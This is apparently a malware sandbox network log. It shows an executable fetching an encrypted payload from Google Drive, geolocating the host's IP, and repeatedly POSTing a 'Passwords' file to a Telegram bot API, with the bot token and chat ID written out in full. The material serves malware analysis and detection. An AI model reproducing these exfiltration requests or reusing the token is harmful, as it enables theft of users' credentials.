                                                                                                          2025-01-10 20:25:13 UTC258OUTGET /download?id=1jNXENZ8HhH2flLMcD7n_1A0wmK9-bvgf&export=download HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Cache-Control: no-cache
                                                                                                          Host: drive.usercontent.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:25:16 UTC4938INHTTP/1.1 200 OK
                                                                                                          X-GUploader-UploadID: AFIdbgRHsMC1CiBwq9PbFiIpyYeP4oFCfXPluExMvXb6cHxrMVV8qGXXhGnxwtfEepwpc6mz
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Security-Policy: sandbox
                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Content-Disposition: attachment; filename="vuHzIEsHyHgOazy113.bin"
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94272
                                                                                                          Last-Modified: Thu, 12 Dec 2024 05:43:27 GMT
                                                                                                          Date: Fri, 10 Jan 2025 20:25:15 GMT
                                                                                                          Expires: Fri, 10 Jan 2025 20:25:15 GMT
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          X-Goog-Hash: crc32c=E7ANfg==
                                                                                                          Server: UploadServer
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2025-01-10 20:25:16 UTC4938INData Raw: 6f 62 e1 51 24 ae d9 cb 7c d4 d1 51 d3 3d cc 5d a6 95 4b 61 74 0c b2 9e a4 1e 65 f1 9e e5 ce 99 16 69 36 0c 7f 29 42 f1 26 25 a6 dc 18 c8 af 72 b8 ee 40 45 9d 77 f4 dd 64 07 21 8f 1b 79 ac c3 c0 07 73 53 68 bd 9b fc e7 c6 a1 68 9b 20 eb cb 55 c3 97 86 26 0f 11 10 78 c3 0a 25 67 d6 2d 8d db ae 80 ab ec e6 b9 ca f9 67 43 61 bd 5a 55 47 f3 82 44 b9 02 18 16 b3 fb ac fd 5d b2 63 9e 8e 35 83 02 9d 0c 61 39 48 66 33 1d 82 2a 9a b0 05 58 af 76 8c 9e 84 17 e6 38 70 f7 03 0e fe 74 68 f0 6b aa 73 c7 2a 76 ac 07 56 3d 96 b7 20 37 2a 08 00 69 61 cd 8b 34 6a 4a 47 66 b7 b8 7a 6c 56 26 bf a0 97 a3 e6 28 32 3d df 79 f4 96 72 7c 44 73 57 5b 9a 20 76 7a 3e ec cd 8c a6 1f 82 35 0d b7 0a 2d 4e 24 de 43 b6 c1 32 10 cf b2 5c ef b6 e8 31 4d 41 0e ac cd c8 e9 78 63 b9 4c e6 a8
                                                                                                          Data Ascii: obQ$|Q=]Katei6)B&%r@Ewd!ysShh U&x%g-gCaZUGD]c5a9Hf3*Xv8pthks*vV= 7*ia4jJGfzlV&(2=yr|DsW[ vz>5-N$C2\1MAxcL
                                                                                                          2025-01-10 20:25:16 UTC4821INData Raw: fb d2 3d 83 a4 08 22 ce 54 53 81 eb 90 0e b8 d9 8c d4 ac 3c 2f 4d ae d1 2b 61 28 f4 32 a8 f8 53 48 9a 24 47 af a5 d4 bd 89 1c 0a 17 12 28 45 4d 26 b1 f3 7a 18 cc 42 0a e7 8b 73 cd 48 8a be 28 4f 28 bf cb ad 08 e0 5c f8 96 b1 72 59 30 d7 37 d9 4d f4 aa 7a 63 4d 81 9c fd ff 74 1e 85 85 eb e8 3b 65 23 2b 36 46 08 39 8e 27 76 bb 34 63 66 f7 65 2d b2 43 0f 00 1e 77 31 44 96 87 13 26 d4 d7 34 9e 42 ed ad b8 05 4d b0 9a ca 9d 3d 19 71 9d 22 40 96 f7 c5 3a 86 09 4c f2 79 a5 2c 18 90 2e dd 5f ac bd e4 66 1d f9 c6 fa dc ac d4 e3 52 c6 1b 73 48 1e 39 26 ac 6c 03 4b 3a 74 a7 18 42 41 e5 d8 c7 57 c0 56 08 3d ae ae 3d 2e 8e 72 6e 41 a9 df 89 55 91 d2 00 de af 25 8a df 95 47 76 7e ea 7b b5 f7 f2 4a 40 fd f4 7f 26 e3 ee ba 13 5f 21 e1 a9 bf 15 6a 2c 7b 61 0d 91 5f f4 c3
                                                                                                          Data Ascii: ="TS</M+a(2SH$G(EM&zBsH(O(\rY07MzcMt;e#+6F9'v4cfe-Cw1D&4BM=q"@:Ly,._fRsH9&lK:tBAWV==.rnAU%Gv~{J@&_!j,{a_
                                                                                                          2025-01-10 20:25:16 UTC1390INData Raw: 26 1f b6 b4 d8 55 62 15 05 93 eb 18 64 1a fa 49 4f bb 93 9a 0c 41 10 cb 06 3d d7 a5 44 33 0e 3b 11 c2 47 71 05 62 a8 b9 7a bf 69 36 21 c4 6c 63 7f e5 d9 8b e4 d7 fc 16 c5 b4 85 de 11 43 66 2b 3a 10 0e 09 1c 02 51 4d 94 cc 05 d1 ea 11 3b 90 46 0c 81 1e 9e bd 92 77 01 95 94 f8 10 72 d3 dc 01 c3 34 44 cf 78 53 42 d3 9e 31 b8 c3 85 02 93 45 ac 8b 5c ee 2f fb c9 69 e0 fa 61 84 10 27 72 6e d4 e2 a5 6c b7 e6 39 f6 bb b6 a9 b6 8e 49 84 17 de 4d 4c 39 27 b4 4c b9 5c 4d 88 f0 c5 0c e3 c2 28 dd e5 ee ca 02 98 8c 20 51 72 11 e2 15 a5 8f e1 5e 81 7c f3 57 64 30 9a cb a2 1e bc 5c 6d a7 72 4d 91 9e 8b 3d c8 3a 3b e3 4c 4e 9e f9 51 39 97 0a b9 bb 4b 98 2d 2e 93 9c 10 8d 11 04 37 d5 6d 8b 58 8c 8e 3f ac 5f 89 94 8f ab 1e 00 6d 87 c7 af 31 55 75 31 06 40 46 cb 66 22 47 97
                                                                                                          Data Ascii: &UbdIOA=D3;Gqbzi6!lcCf+:QM;Fwr4DxSB1E\/ia'rnl9IML9'L\M( Qr^|Wd0\mrM=:;LNQ9K-.7mX?_m1Uu1@Ff"G
                                                                                                          2025-01-10 20:25:16 UTC1390INData Raw: 02 b7 ce 3d 3d 2a 84 60 12 7b 74 df 8d 2c 16 d7 11 d1 91 b3 45 d6 e8 d0 88 68 ec 6a b2 83 0b 4b 40 f7 fe 01 da e3 c5 bc 60 c8 0b e0 b3 ac 1d 16 37 66 61 73 74 c3 f0 c3 17 9e da e4 3f 4a 03 a5 28 22 88 08 3f 9f 58 65 f4 17 40 4e bf c8 e3 5f 37 c3 00 86 9c 0a 3b 00 5c d1 0d 8f 85 d5 13 35 ff 06 9b 04 46 77 aa c2 6d d2 ff 12 07 c5 35 9d c8 24 6d 6f f3 cc 46 62 27 59 02 eb 12 18 75 ec 37 95 be 85 92 05 31 06 cb 72 50 73 ee 44 39 a8 36 d4 bc 99 7b 05 6a df da 05 c2 54 59 fe c0 6e 6b a6 8d c1 f5 3e ff 2d 1c b7 5a ef 92 61 2c bd 2b 3a 30 ac 2c 05 6f bf 4f 94 5c 77 46 f2 35 4b ff 88 0c 83 6f 7a ae 95 62 78 d5 9c ee 09 53 bf 7d 03 c9 3e 53 d4 6d 4b dc ec 99 22 c9 91 7b 01 84 66 6e 80 65 60 2d fb c9 7a 91 df 81 84 14 53 32 62 c2 fb 80 00 d6 e4 33 fd ad a9 bd aa 11
                                                                                                          Data Ascii: ==*`{t,EhjK@`7fast?J("?Xe@N_7;\5Fwm5$moFb'Yu71rPsD96{jTYnk>-Za,+:0,oO\wF5KozbxS}>SmK"{fne`-zS2b3
                                                                                                          2025-01-10 20:25:16 UTC1390INData Raw: 3c 81 9c fd fa 98 0e 84 ef 0b ed 02 74 95 38 25 57 68 a2 54 30 aa 25 6b 72 60 88 68 39 a4 54 69 ff fc 72 3b 5b 0b 91 02 3e c5 d2 24 e0 de 82 5f b2 7b 66 96 8b da e4 3c 39 a1 97 22 51 6e de 47 2d 97 14 2d 9b 63 bc 70 36 b0 3d c5 59 e8 85 e4 71 04 c9 81 eb cf b1 61 62 48 d0 02 68 61 2e 49 22 ab 7d 67 24 3c e5 b8 3c 01 c4 ff cc a6 64 16 49 77 18 cf 2c 29 3f 9f e3 0f 6e 57 de 9b d8 04 f9 01 c2 af 3e 8a c5 e9 cf 67 63 d9 93 b3 98 64 5b 56 e4 ea 10 12 f2 f5 2f 48 0c 21 e1 a9 bf 02 05 29 69 7e 21 26 c3 ff c9 3f d0 da ff 05 53 15 9d c9 27 88 54 2c bf 58 73 f5 4c 5a 4e c5 ac 0a d2 08 c9 2d 89 a8 0a 3b 58 53 d1 0d 42 53 c2 61 d9 c1 07 fc b5 42 7e f9 d3 59 c3 ad 9c 4d cd 5c 9c d7 f2 0e ee ee c0 43 98 3c c7 b7 fa 36 0a 75 eb 6c 67 b9 94 83 6f dd 03 e8 02 3f 87 c9 55
                                                                                                          Data Ascii: <t8%WhT0%kr`h9Tir;[>$_{f<9"QnG--cp6=YqabHha.I"}g$<<dIw,)?nW>gcd[V/H!)i~!&?S'T,XsLZN-;XSBSaB~YM\C<6ulgo?U
                                                                                                          2025-01-10 20:25:16 UTC1390INData Raw: e6 b0 07 9e 5a e7 1e c5 7e a3 08 04 5f 02 6c 1a 8d b6 28 f8 0b 5f 84 35 40 f7 ac 9e 48 3b 92 a8 6a d7 c6 42 51 1c 8a d4 c7 a9 d1 e9 aa a5 53 53 65 94 db 2b 15 29 fd 23 a5 a4 45 48 9a 2f 54 7b b8 de db 58 1b 03 72 00 23 54 4c 35 61 3c 65 11 fd 60 00 88 7f 60 c9 42 b5 83 d7 4f 22 68 b3 af 09 e0 56 d0 fc cf 6a 53 3c d3 45 8f 57 fc b5 ec 4b cc 8b 8f fa f8 87 32 26 5e ed fc 0a 0b 33 2b 36 47 57 b8 9f 2f 09 b9 32 72 61 e6 7a 2d b2 4d 7c 51 16 f9 52 30 c2 90 c9 3b 02 4b 6b f1 cd ec be b5 73 77 a1 9d d8 fa 23 70 6a 4d 0a 37 90 df 5e 3a 86 12 39 96 64 8d bb 30 a6 24 ce 5d 1d a0 c1 4e 24 d1 81 f0 cf a8 bb 60 5c a9 10 72 59 12 63 20 aa 6c 79 35 33 67 a3 34 62 d3 ee d2 69 7f 87 56 19 33 cb 16 3d 28 ae 72 10 52 b5 df 8d 24 05 95 00 89 18 22 8c d9 fa d2 76 7e e0 b1 b2
                                                                                                          Data Ascii: Z~_l(_5@H;jBQSSe+)#EH/T{Xr#TL5a<e``BO"hVjS<EWK2&^3+6GW/2raz-M|QR0;Kksw#pjM7^:9d0$]N$`\rYc ly53g4biV3=(rR$"v~
                                                                                                          2025-01-10 20:25:16 UTC1390INData Raw: ba 41 e0 d8 26 a9 68 6d 7e 13 91 2c 94 64 c8 ba b9 94 a3 95 d1 d5 f1 eb 2b 45 12 28 f7 2b d8 36 36 cd 1a c2 46 de d7 1e 66 c1 a3 df 55 13 74 cf c7 45 78 0d e2 22 09 d1 66 0f 64 3e 24 f3 a2 37 1a e5 2b 50 74 c3 cb bf d3 f8 9e 87 19 32 1c f8 38 f3 02 97 3d 6f 2c 07 56 65 4e 1b 17 91 b0 3b 9b 89 83 9b be 16 b7 ab eb 51 81 ee f9 39 1d 15 60 cf 66 2b 88 72 4d 6c 27 6f b2 7d 75 73 fb 6c 10 96 b8 28 97 0b 5f 88 0e be f7 ac 94 70 1d 83 86 af 2b c6 48 53 1e 85 8d 18 a4 d9 f6 bb 70 53 59 4b c1 84 2b 1f 30 dc 8e ac d0 de 5b 9f 2e 56 75 db 36 b1 a5 6b 15 50 92 28 45 4d 30 93 2e 78 38 96 93 0f e7 f1 76 e1 c9 a2 ec 22 59 dc 61 83 bc 04 f1 50 d4 db d2 e7 66 30 d3 44 aa 50 86 3c 78 4b bc 23 b9 e0 e0 28 3a 8e f2 d6 f8 02 0e 80 0e 2f 57 7f 17 ab 3d 0e ee 27 72 10 2b 5e 36
                                                                                                          Data Ascii: A&hm~,d+E(+66FfUtEx"fd>$7+Pt28=o,VeN;Q9`f+rMl'o}usl(_p+HSpSYK+0[.Vu6kP(EM0.x8v"YaPf0DP<xK#(:/W='r+^6
                                                                                                          2025-01-10 20:25:16 UTC1390INData Raw: 6c 47 98 04 e3 80 2a 65 6e 47 66 9c 98 7a 44 fc 76 fa aa 9f fe e0 59 ae 96 e5 7c 2a 43 72 7c 42 1c 08 5b 9a ca 5e c4 3f e7 ca cf a3 1f f5 30 7f 55 07 2d 3e 32 f6 c2 b6 1f bd 07 31 b1 6d ea c4 0a 94 4c 31 18 84 0c c8 e9 52 75 47 4f bb bb 07 61 7c 9b 3a 3a 22 f4 5a 9b c8 bf 5d b3 e8 8e 45 46 41 a6 08 e0 e3 f9 23 7f 3c 94 2f f0 42 21 de 0f 98 eb aa 11 54 ef 7b 7a d4 a2 b2 21 96 66 52 88 a4 e6 8d bd c0 a2 21 ab 97 45 62 4d 31 26 a6 3f 3b c5 0f d4 39 88 85 1e 16 a4 f6 d0 55 15 63 cb cf 45 78 68 a8 2d 0e b0 0e cb 62 00 c2 1e 58 d9 1f cd 66 40 51 ed eb b7 c2 fa a1 ca 1f 32 4d f9 38 f3 b3 93 3c 45 67 74 53 64 4e 11 3f 05 a3 3b 9d 9a dd 8b b7 02 23 ab f8 5b 80 e4 ef c7 58 06 6b df 76 37 9a 5a 9b 6d 27 65 90 78 1a 3d fb 73 06 af 69 00 02 01 2d 10 3d bb 87 84 da 5b
                                                                                                          Data Ascii: lG*enGfzDvY|*Cr|B[^?0U->21mL1RuGOa|::"Z]EFA#</B!T{z!fR!EbM1&?;9UcExh-bXf@Q2M8<EgtSdN?;#[Xkv7Zm'ex=si-=[
                                                                                                          2025-01-10 20:25:16 UTC1390INData Raw: 51 2f 78 ff 21 a0 9f 9b 8c 41 ee 01 68 64 d5 f8 c6 93 cc 97 86 22 1e 1c 38 76 c3 0a 2f e7 d9 2d 8d df ae 80 ba eb f1 6f d9 fe 76 44 70 bb 64 b5 b9 0c 7d 44 b9 dc 08 33 9b c8 ac fd 57 21 6d 9e a6 69 9c b8 99 d2 d5 30 af 06 97 1c ce e7 bb e4 6d 22 dc 56 fc bb ea 70 94 33 1c d7 60 7f 90 1a 07 c0 4b c8 17 fc 68 07 c2 5b 3e 53 b6 c0 6f 64 1b 65 70 11 2c 3b 86 39 6a 1c 74 45 b7 c8 52 22 56 76 f0 aa 97 e9 cf d3 32 8a ef 07 42 af 34 7d 44 73 51 28 4d c0 76 7e 33 ef be 86 ba 1f 94 5b df b7 02 2b 68 2c b1 90 b6 1f b1 06 15 a1 7a f9 a5 ef a9 5b 40 0e ac 85 d9 ee 2a 0b a5 4c 94 c7 de 70 70 b1 7a 2f be cc 28 e5 d5 9a 3b ae db 9a 45 30 f0 87 17 f8 46 ae a7 11 10 f1 40 55 e0 04 c1 0d 99 58 8a 23 b5 a9 6e 7c b7 08 86 32 ab 20 f6 85 bb 95 a3 97 af d6 82 83 3d 2a 67 46 22
                                                                                                          Data Ascii: Q/x!Ahd"8v/-ovDpd}D3W!mi0m"Vp3`Kh[>Sodep,;9jtER"Vv2B4}DsQ(Mv~3[+h,z[@*Lppz/(;E0F@UX#n|2 =*gF"
                                                                                                          2025-01-10 20:25:16 UTC1390INData Raw: 8e 3b dd 8e 1c 26 e9 c7 6c a4 76 39 6c c5 d9 f4 40 4e 5a 61 50 9f 61 0c d9 4b 65 c3 6e 32 f8 72 ad ed f2 d3 d9 49 02 59 dd 02 f1 34 92 40 35 5c ba bb 46 da fc 56 a7 f5 91 2b 88 eb 10 7a 51 ee 34 26 9f 9c 13 c8 5c 78 dc db df a0 f7 45 f4 80 dd 12 6b c8 d7 93 b9 0f 79 6c 52 ac d9 43 85 de ca 42 10 ac c2 bb b3 29 2b d2 dd c3 2a c7 ac cc 93 55 8d 57 8c 57 6a bd 91 93 e6 c7 a1 62 4c 4b eb cb eb d0 9e 97 2f 1b ef 11 2b c9 1b 2f 71 28 2c 9e d0 bf 8b 87 fa ce 13 ca f9 6d 52 64 d2 05 55 47 f9 93 4d 91 97 18 16 b5 e8 a9 fd 5d 32 48 be 8e 13 36 b8 93 06 dd 21 82 35 17 00 ce 97 d4 31 6d 31 da 39 a3 ec eb 7a bc e5 1d d7 66 7c 95 1a 16 80 39 2a 13 e7 28 15 ea a6 3f 53 bc e5 91 67 1b 60 1d ef 01 e3 f6 2f 48 ef 47 66 bd ae 84 6f 09 65 f6 b1 9b c3 aa 36 bf b5 e5 0c 44 b3
                                                                                                          Data Ascii: ;&lv9l@NZaPaKen2rIY4@5\FV+zQ4&\xEkylRCB)+*UWWjbLK/+/q(,mRdUGM]2H6!51m19zf|9*(?Sg`/HGfoe6D


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.849712104.21.112.14435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:25:27 UTC861INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:25:27 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1855516
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nrESXivIkcL4yeE%2FrBV6pLPWBRQOcJ1qWNJ9BRo9IzJRFiMv6V15mW%2FBq9DFm20GYVQqf%2BPAE5wzALrOVD%2BDISmULRHfkyTVkPiSwsNRG6bFt%2FqEgZ9kZoBRhQo%2FlA3MPRZu1aT1"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fff657bcd4d43b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1572&rtt_var=600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1805813&cwnd=203&unsent_bytes=0&cid=21f7070160c64255&ts=162&x=0"
                                                                                                          2025-01-10 20:25:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.849724149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:34 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd318b05b80552
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:25:34 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 62 30 35 62 38 30 35 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd318b05b80552Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:25:36 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:25:36 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:25:36 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.849751149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:38 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31bfeb0e4d02
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:25:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 66 65 62 30 65 34 64 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31bfeb0e4d02Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:25:38 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:25:38 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:25:38 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.849778149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:25:42 UTC272OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31e806c5ea20
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:25:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 38 30 36 63 35 65 61 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31e806c5ea20Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:25:42 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
